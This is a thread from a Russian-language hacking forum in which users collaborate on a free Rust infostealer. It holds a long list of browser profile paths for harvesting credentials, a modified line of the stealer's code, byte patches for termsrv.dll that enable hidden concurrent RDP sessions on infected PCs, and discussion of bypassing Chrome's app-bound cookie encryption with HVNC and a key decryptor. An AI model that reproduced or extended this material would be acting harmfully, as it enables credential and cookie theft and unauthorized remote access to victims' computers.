• XSS.stack #1 – первый литературный журнал от юзеров форума

FREE & opensrc Rust Stealer

Отслеживать
Heres the list I have so far (pulled from different stealers on github). Some programs dont have "User Data" in the path so it doesn'd find. I want to hopefully add these other gecko based programs by implementing a search function similar to the way it does for chrome (if possible). Im willing to send crypto to buy someone helpful beer


"Thorium": "AppData\\Local\\Thorium\\User Data",
"Chrome": "AppData\\Local\\Google\\Chrome\\User Data",
"Chrome (x86)": "AppData\\Local\\Google(x86)\\Chrome\\User Data",
"Chrome SxS": "AppData\\Local\\Google\\Chrome SxS\\User Data",
"Maple": "AppData\\Local\\MapleStudio\\ChromePlus\\User Data",
"Iridium": "AppData\\Local\\Iridium\\User Data",
"7Star": "AppData\\Local\\7Star\\7Star\\User Data",
"CentBrowser": "AppData\\Local\\CentBrowser\\User Data",
"Chedot": "AppData\\Local\\Chedot\\User Data",
"Vivaldi": "AppData\\Local\\Vivaldi\\User Data",
"Kometa": "AppData\\Local\\Kometa\\User Data",
"Elements": "AppData\\Local\\Elements Browser\\User Data",
"Epic Privacy Browser": "AppData\\Local\\Epic Privacy Browser\\User Data",
"Uran": "AppData\\Local\\uCozMedia\\Uran\\User Data",
"Fenrir": "AppData\\Local\\Fenrir Inc\\Sleipnir5\\setting\\modules\\ChromiumViewer",
"Catalina": "AppData\\Local\\CatalinaGroup\\Citrio\\User Data",
"Coowon": "AppData\\Local\\Coowon\\Coowon\\User Data",
"Liebao": "AppData\\Local\\liebao\\User Data",
"QIP Surf": "AppData\\Local\\QIP Surf\\User Data",
"Orbitum": "AppData\\Local\\Orbitum\\User Data",
"Dragon": "AppData\\Local\\Comodo\\Dragon\\User Data",
"360Browser": "AppData\\Local\\360Browser\\Browser\\User Data",
"Maxthon": "AppData\\Local\\Maxthon3\\User Data",
"K-Melon": "AppData\\Local\\K-Melon\\User Data",
"CocCoc": "AppData\\Local\\CocCoc\\Browser\\User Data",
"Brave": "AppData\\Local\\BraveSoftware\\Brave-Browser\\User Data",
"Amigo": "AppData\\Local\\Amigo\\User Data",
"Torch": "AppData\\Local\\Torch\\User Data",
"Sputnik": "AppData\\Local\\Sputnik\\Sputnik\\User Data",
"Edge": "AppData\\Local\\Microsoft\\Edge\\User Data",
"DCBrowser": "AppData\\Local\\DCBrowser\\User Data",
"Yandex": "AppData\\Local\\Yandex\\YandexBrowser\\User Data",
"UR Browser": "AppData\\Local\\UR Browser\\User Data",
"Slimjet": "AppData\\Local\\Slimjet\\User Data",
"Opera": "AppData\\Roaming\\Opera Software\\Opera Stable",
"OperaGX": "AppData\\Roaming\\Opera Software\\Opera GX Stable",
"ChromeBeta": "AppData\\Local\\Google\\Chrome Beta\\User Data\\Default\\",
"Edge": "AppData\\Local\\Microsoft\\Edge\\User Data\\Default\\",
"Brave": "AppData\\Local\\BraveSoftware\\Brave-Browser\\User Data\\Default\\",
"Speed360": "AppData\\Local\\360chrome\\Chrome\\User Data\\Default\\",
"QQBrowser": "AppData\\Local\\Tencent\\QQBrowser\\User Data\\Default\\",
"Sogou": "AppData\\Roaming\\SogouExplorer\\Webkit\\Default\\",



"Firefox": "AppData\\Roaming\\Mozilla\\Firefox\\Profiles",
"SeaMonkey": "AppData\\Roaming\\Mozilla\\SeaMonkey\\Profiles",
"Waterfox": "AppData\\Roaming\\Waterfox\\Profiles",
"K-Meleon": "AppData\\Roaming\\K-Meleon\\Profiles",
"Thunderbird": "AppData\\Roaming\\Thunderbird\\Profiles",
"IceDragon": "AppData\\Roaming\\Comodo\\IceDragon\\Profiles",
"Cyberfox": "AppData\\Roaming\\8pecxstudios\\Cyberfox\\Profiles",
"BlackHaw": "AppData\\Roaming\\NETGATE Technologies\\BlackHaw\\Profiles",
"Pale Moon": "AppData\\Roaming\\Moonchild Productions\\Pale Moon\\Profiles",
"Mercury": "AppData\\Roaming\\mercury\\Profiles",

Also I changed line 32 of chromium/mod.rs to add the other browsers:
if dir.file_name().to_string_lossy().contains(obfstr::obfstr!("User Data")) || dir.file_name().to_string_lossy().contains(obfstr::obfstr!("Opera")) || dir.file_name().to_string_lossy().contains(obfstr::obfstr!("Default"))
 
Lipshitz сказал(а):
Heres the list I have so far (pulled from different stealers on github). Some programs dont have "User Data" in the path so it doesn'd find. I want to hopefully add these other gecko based programs by implementing a search function similar to the way it does for chrome (if possible). Im willing to send crypto to buy someone helpful beer


"Thorium": "AppData\\Local\\Thorium\\User Data",
"Chrome": "AppData\\Local\\Google\\Chrome\\User Data",
"Chrome (x86)": "AppData\\Local\\Google(x86)\\Chrome\\User Data",
"Chrome SxS": "AppData\\Local\\Google\\Chrome SxS\\User Data",
"Maple": "AppData\\Local\\MapleStudio\\ChromePlus\\User Data",
"Iridium": "AppData\\Local\\Iridium\\User Data",
"7Star": "AppData\\Local\\7Star\\7Star\\User Data",
"CentBrowser": "AppData\\Local\\CentBrowser\\User Data",
"Chedot": "AppData\\Local\\Chedot\\User Data",
"Vivaldi": "AppData\\Local\\Vivaldi\\User Data",
"Kometa": "AppData\\Local\\Kometa\\User Data",
"Elements": "AppData\\Local\\Elements Browser\\User Data",
"Epic Privacy Browser": "AppData\\Local\\Epic Privacy Browser\\User Data",
"Uran": "AppData\\Local\\uCozMedia\\Uran\\User Data",
"Fenrir": "AppData\\Local\\Fenrir Inc\\Sleipnir5\\setting\\modules\\ChromiumViewer",
"Catalina": "AppData\\Local\\CatalinaGroup\\Citrio\\User Data",
"Coowon": "AppData\\Local\\Coowon\\Coowon\\User Data",
"Liebao": "AppData\\Local\\liebao\\User Data",
"QIP Surf": "AppData\\Local\\QIP Surf\\User Data",
"Orbitum": "AppData\\Local\\Orbitum\\User Data",
"Dragon": "AppData\\Local\\Comodo\\Dragon\\User Data",
"360Browser": "AppData\\Local\\360Browser\\Browser\\User Data",
"Maxthon": "AppData\\Local\\Maxthon3\\User Data",
"K-Melon": "AppData\\Local\\K-Melon\\User Data",
"CocCoc": "AppData\\Local\\CocCoc\\Browser\\User Data",
"Brave": "AppData\\Local\\BraveSoftware\\Brave-Browser\\User Data",
"Amigo": "AppData\\Local\\Amigo\\User Data",
"Torch": "AppData\\Local\\Torch\\User Data",
"Sputnik": "AppData\\Local\\Sputnik\\Sputnik\\User Data",
"Edge": "AppData\\Local\\Microsoft\\Edge\\User Data",
"DCBrowser": "AppData\\Local\\DCBrowser\\User Data",
"Yandex": "AppData\\Local\\Yandex\\YandexBrowser\\User Data",
"UR Browser": "AppData\\Local\\UR Browser\\User Data",
"Slimjet": "AppData\\Local\\Slimjet\\User Data",
"Opera": "AppData\\Roaming\\Opera Software\\Opera Stable",
"OperaGX": "AppData\\Roaming\\Opera Software\\Opera GX Stable",
"ChromeBeta": "AppData\\Local\\Google\\Chrome Beta\\User Data\\Default\\",
"Edge": "AppData\\Local\\Microsoft\\Edge\\User Data\\Default\\",
"Brave": "AppData\\Local\\BraveSoftware\\Brave-Browser\\User Data\\Default\\",
"Speed360": "AppData\\Local\\360chrome\\Chrome\\User Data\\Default\\",
"QQBrowser": "AppData\\Local\\Tencent\\QQBrowser\\User Data\\Default\\",
"Sogou": "AppData\\Roaming\\SogouExplorer\\Webkit\\Default\\",



"Firefox": "AppData\\Roaming\\Mozilla\\Firefox\\Profiles",
"SeaMonkey": "AppData\\Roaming\\Mozilla\\SeaMonkey\\Profiles",
"Waterfox": "AppData\\Roaming\\Waterfox\\Profiles",
"K-Meleon": "AppData\\Roaming\\K-Meleon\\Profiles",
"Thunderbird": "AppData\\Roaming\\Thunderbird\\Profiles",
"IceDragon": "AppData\\Roaming\\Comodo\\IceDragon\\Profiles",
"Cyberfox": "AppData\\Roaming\\8pecxstudios\\Cyberfox\\Profiles",
"BlackHaw": "AppData\\Roaming\\NETGATE Technologies\\BlackHaw\\Profiles",
"Pale Moon": "AppData\\Roaming\\Moonchild Productions\\Pale Moon\\Profiles",
"Mercury": "AppData\\Roaming\\mercury\\Profiles",

Also I changed line 32 of chromium/mod.rs to add the other browsers:
if dir.file_name().to_string_lossy().contains(obfstr::obfstr!("User Data")) || dir.file_name().to_string_lossy().contains(obfstr::obfstr!("Opera")) || dir.file_name().to_string_lossy().contains(obfstr::obfstr!("Default"))
Ah, I see then there is need of changing few things
 
Tomek сказал(а):
You mean RAT option, yes but check how is it working because it will just create new user on somebody PC, and you will use RDP to connect to it, thus it will only work if infected PC is running windows PRO version!!!
Код: 
patch termsvc.dll to enable concurrent remote desktop sessions:

- Windows 10 version 1511         (November Update): This version replaces `8B 99 3C 06 00 00 8B B9 38 06 00 00` with `B8 00 01 00 00 89 81 38 06 00 00 90`. It can also use RDPWrap with the ini file that has the entries for `[10.0.10586.0]` and `[10.0.10586.0-SLInit]`.
- Windows 10 version 1607      (Anniversary Update): This version replaces `39 81 3C 06 00 00 0F 84 D5 FA FF FF` with `B8 00 01 00 00 89 81 38 06 00 00`. It can also use RDPWrap with the ini file that has the entries for `[10.0.14393.447]` and `[10.0.14393.447-SLInit]`.
- Windows 10 version 1703         (Creators Update): This version replaces `8B 99 3C 06 00 00 C7 FB FF FF FF FF` with `B8 F4 FF FF FF C7 FB F4 FF FF FF`. It can also use RDPWrap with the ini file that has the entries for `[10.0.15063.0]` and `[10.0.15063.0-SLInit]`.
- Windows 10 version 1709    (Fall Creators Update): This version replaces `39 C1 E9 D4 FE FF FF` with `B8 F4 FF FF FF E9 D5 FE FF FF`. It can also use RDPWrap with the ini file that has the entries for `[10.0.16299.15]` and `[10.0.16299.15-SLInit]`.
- Windows 10 version 1803       (April 2018 Update): This version replaces `8B B9 FC FE FF FF E9 D4 FE FF FF` with `B8 F4 FF FF FF E9 D5 FE FF FF`. It can also use RDPWrap with the ini file that has the entries for `[10.0.17134.1]` and `[10.0.17134.1-SLInit]`.
- Windows 10 version 1809     (October 2018 Update): This version replaces `39 C1 E9 D4 FE FF FF` with `B8 F4 FF FF FF E9 D5 FE FF FF`. It can also use RDPWrap with the ini file that has the entries for `[10.0.17763.1]` and `[10.0.17763.1-SLInit]`.
- Windows 10 version 1903         (May 2019 Update): This version replaces `39 C1 E9 D4 FE FF FF` with `B8 F4 FF FF FF E9 D5 FE FF FF`. It can also use RDPWrap with the ini file that has the entries for `[10.0.18362.53]`, `[10.0.18362.x64]`, and `[10.0.18362.x64-SLInit]`.
- Windows 10 version 1909    (November 2019 Update): This version replaces `39 C1 E9 D4 FE FF FF` with `B8 F4 FF FF FF E9 D5 FE FF FF`. It can also use RDPWrap with the ini file that has the entries for `[10.0.18362.x64+1909]`, `[10.0.18362.x64+1909-SLInit]`, and `[10.0.x64+1909-SLInit]`.
- Windows 10 version 2004         (May 2020 Update): This version replaces `39 81 3C 06 00 00 0F 84 5D 61 01 00` with `B8 00 01 00 00 89 81 38 06 00 00`. It can also use RDPWrap with the ini file that has the entries for `[10.0.19041.84]`, `[10.0.19041.84-SLInit]`, and `[10.0.x64+2004-SLInit]`.
- Windows 10 version 20H2     (October 2020 Update): This version replaces `39 C1 E9 D4 FE FF FF` with `B8 F4 FF FF FF E9 D5 FE FF FF`. It can also use RDPWrap with the ini file that has the entries for `[10.0.19041.84]`, `[10.0.19041.84-SLInit]`, and `[10.0.x64+2004-SLInit]`.
- Windows 10 version 21H1         (May 2021 Update): This version replaces `39 C1 E9 D4 FE FF FF` with `B8 F4 FF FF FF E9 D5 FE FF FF`. It can also use RDPWrap with the ini file that has the entries for `[10.0.19041.84]`, `[10.0.19041.84-SLInit]`, and `[10.0.x64+2004-SLInit]`.
 
Последнее редактирование:
DimmuBurgor сказал(а):
Код: 
patch termsvc.dll to enable concurrent remote desktop sessions:

- Windows 10 version 1511         (November Update): This version replaces `8B 99 3C 06 00 00 8B B9 38 06 00 00` with `B8 00 01 00 00 89 81 38 06 00 00 90`. It can also use RDPWrap with the ini file that has the entries for `[10.0.10586.0]` and `[10.0.10586.0-SLInit]`.
- Windows 10 version 1607      (Anniversary Update): This version replaces `39 81 3C 06 00 00 0F 84 D5 FA FF FF` with `B8 00 01 00 00 89 81 38 06 00 00`. It can also use RDPWrap with the ini file that has the entries for `[10.0.14393.447]` and `[10.0.14393.447-SLInit]`.
- Windows 10 version 1703         (Creators Update): This version replaces `8B 99 3C 06 00 00 C7 FB FF FF FF FF` with `B8 F4 FF FF FF C7 FB F4 FF FF FF`. It can also use RDPWrap with the ini file that has the entries for `[10.0.15063.0]` and `[10.0.15063.0-SLInit]`.
- Windows 10 version 1709    (Fall Creators Update): This version replaces `39 C1 E9 D4 FE FF FF` with `B8 F4 FF FF FF E9 D5 FE FF FF`. It can also use RDPWrap with the ini file that has the entries for `[10.0.16299.15]` and `[10.0.16299.15-SLInit]`.
- Windows 10 version 1803       (April 2018 Update): This version replaces `8B B9 FC FE FF FF E9 D4 FE FF FF` with `B8 F4 FF FF FF E9 D5 FE FF FF`. It can also use RDPWrap with the ini file that has the entries for `[10.0.17134.1]` and `[10.0.17134.1-SLInit]`.
- Windows 10 version 1809     (October 2018 Update): This version replaces `39 C1 E9 D4 FE FF FF` with `B8 F4 FF FF FF E9 D5 FE FF FF`. It can also use RDPWrap with the ini file that has the entries for `[10.0.17763.1]` and `[10.0.17763.1-SLInit]`.
- Windows 10 version 1903         (May 2019 Update): This version replaces `39 C1 E9 D4 FE FF FF` with `B8 F4 FF FF FF E9 D5 FE FF FF`. It can also use RDPWrap with the ini file that has the entries for `[10.0.18362.53]`, `[10.0.18362.x64]`, and `[10.0.18362.x64-SLInit]`.
- Windows 10 version 1909    (November 2019 Update): This version replaces `39 C1 E9 D4 FE FF FF` with `B8 F4 FF FF FF E9 D5 FE FF FF`. It can also use RDPWrap with the ini file that has the entries for `[10.0.18362.x64+1909]`, `[10.0.18362.x64+1909-SLInit]`, and `[10.0.x64+1909-SLInit]`.
- Windows 10 version 2004         (May 2020 Update): This version replaces `39 81 3C 06 00 00 0F 84 5D 61 01 00` with `B8 00 01 00 00 89 81 38 06 00 00`. It can also use RDPWrap with the ini file that has the entries for `[10.0.19041.84]`, `[10.0.19041.84-SLInit]`, and `[10.0.x64+2004-SLInit]`.
- Windows 10 version 20H2     (October 2020 Update): This version replaces `39 C1 E9 D4 FE FF FF` with `B8 F4 FF FF FF E9 D5 FE FF FF`. It can also use RDPWrap with the ini file that has the entries for `[10.0.19041.84]`, `[10.0.19041.84-SLInit]`, and `[10.0.x64+2004-SLInit]`.
- Windows 10 version 21H1         (May 2021 Update): This version replaces `39 C1 E9 D4 FE FF FF` with `B8 F4 FF FF FF E9 D5 FE FF FF`. It can also use RDPWrap with the ini file that has the entries for `[10.0.19041.84]`, `[10.0.19041.84-SLInit]`, and `[10.0.x64+2004-SLInit]`.
Ty a lot, I can implement it later
 
Последнее редактирование:
nobody0 сказал(а):
https://security.googleblog.com/2024/07/improving-security-of-chrome-cookies-on.html Will it mean that only run from SYSTEM priv account will let decrypt cookies ? Or can be bypassed by running from real chrome procces (some dll payload sideload - from chrome.exe wich will run stealer)

Or we all should nvm? )) Cause i just test on Version 127.0.6533.88 (Official Build) (64-bit) - all ok (from admin, not system)
1723356793216.png


yes they admit themselves it is does basically nothing and you can just use HVNC
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Lipshitz сказал(а):
Here's another post by someone saying they got it working. TBH this is above my knowledge. I'm just dropping info here and hoping someone else can figure it out

I compile it , but receive a 203 error too
was compile with g++ -o chrm.exe elevator_decrypt_key.cpp -lstdc++ -lole32 -loleaut32

then i found in localstale
"os_crypt":{"app_bound_encrypted_key":"QVBQQ.............AAAAAAAAAA"
input in app_bound...key.txt --->QVBQQ.............AAAAAAAAAA
run chrm.exe = get 302 error

but according the google docs key shoud have preffix APPB...




upd https://source.chromium.org/chromium/chromium/src/+/main:chrome/browser/os_crypt/README.md
according to that was try to run from programfiles and etc - but same no succes. Also i see that after run program Elevation Service is stopping
 
Последнее редактирование:
nobody0 сказал(а):
I compile it , but receive a 203 error too
was compile with g++ -o chrm.exe elevator_decrypt_key.cpp -lstdc++ -lole32 -loleaut32

then i found in localstale
"os_crypt":{"app_bound_encrypted_key":"QVBQQ.............AAAAAAAAAA"
input in app_bound...key.txt --->QVBQQ.............AAAAAAAAAA
run chrm.exe = get 302 error

but according the google docs key shoud have preffix APPB...




upd https://source.chromium.org/chromium/chromium/src/+/main:chrome/browser/os_crypt/README.md
according to that was try to run from programfiles and etc - but same no succes. Also i see that after run program Elevation Service is stopping


same problem
 
admin


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх